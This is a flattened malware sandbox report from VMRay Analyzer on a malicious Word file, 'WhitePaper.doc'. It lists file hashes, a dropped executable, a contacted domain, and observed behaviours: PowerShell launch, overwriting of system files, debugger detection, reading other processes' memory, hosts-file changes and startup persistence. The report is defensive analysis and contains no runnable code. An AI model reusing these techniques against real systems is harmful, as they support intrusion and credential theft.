(en-US)\Main HKEY_LOCAL_MACHINE Install Directory WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_USERS WinRegistryKey S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_USERS WinRegistryKey SOFTWARE\Mozilla\Mozilla Thunderbird\ HKEY_LOCAL_MACHINE File users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe c:\ c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe exe File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File Windows\SYSTEM32\ntdll.dll Windows\SYSTEM32\ntdll.dll \??\C:\ \??\C:\Windows\SYSTEM32\ntdll.dll dll Analyzed Sample #20883 Malware Artifacts 20883 Sample-ID: #20883 Job-ID: #16520 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #20883 Submission-ID: #21792 C:\Users\BGC6u8Oy yXGxkR\Desktop\WhitePaper.doc doc MD5 30926dda00ebf82f1355217d4285980f SHA1 d1b8a2414232fbeb997dcb4fdc1d9969137a5445 SHA256 1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079 Opened_By Metadata of Analysis for Job-ID #16520 Timeout False x86 32-bit PAE win7_32_sp1-mso2013 True Windows 7 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1) 140.344 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows/system32/WindowsPowerShell/v1.0/powershell.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "doc2th.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create nameless mutex. Create system object File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "\??\C:\Windows\SYSTEM32\ntdll.dll" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "\??\C:\Windows\SYSTEM32\ntdll.dll" in the OS directory. Modify operating system directory Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_kernel_debugger_by_api Check via API "NtQuerySystemInformation". Try to detect kernel debugger Anti Analysis VTI rule match with VTI rule score 4/5 vmray_detect_debugger_by_api Check via API "NtQueryInformationProcess". Try to detect debugger File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "\??\C:\Windows\System32\cmmon32.exe" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "\??\C:\Windows\System32\cmmon32.exe" in the OS directory. Modify operating system directory Anti Analysis VTI rule match with VTI rule score 5/5 vmray_illegitimate_api_usage_by_create_process_internal Internal API "CreateProcessInternalW" was used to start "C:\Windows\System32\cmmon32.exe". Illegitimate API usage Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\cmmon32.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\windows\explorer.exe" reads from "C:\Windows\System32\cmmon32.exe". Read from memory of another process Anti Analysis VTI rule match with VTI rule score 3/5 vmray_delay_execution_by_sleep One thread sleeps more than 5 minutes. Delay execution Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe" reads from "c:\windows\explorer.exe". Read from memory of another process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "664908S9UTEIZ6MN". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "OLO0NDS-0AXWwKzG". Create system object Anti Analysis VTI rule match with VTI rule score 5/5 vmray_illegitimate_api_usage_by_create_process_internal Internal API "CreateProcessInternalW" was used to start "C:\Windows\System32\cmd.exe". Illegitimate API usage Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\cmd.exe". Create process File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory. Modify operating system directory Network VTI rule match with VTI rule score 4/5 vmray_read_hosts_file Read the current network configuration trough the host.conf file. Read network configuration Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\windows\system32\cmmon32.exe" reads from "c:\windows\explorer.exe". Read from memory of another process Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add "C:\Program Files\Crfitq6x\gdigzvh.exe" to windows startup via registry. Install system startup script or application Anti Analysis VTI rule match with VTI rule score 5/5 vmray_illegitimate_api_usage_by_create_process_internal Internal API "CreateProcessInternalW" was used to start "C:\Program Files\Mozilla Firefox\Firefox.exe". Illegitimate API usage Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Program Files\Mozilla Firefox\Firefox.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\windows\system32\cmmon32.exe" reads from "C:\Program Files\Mozilla Firefox\Firefox.exe". Read from memory of another process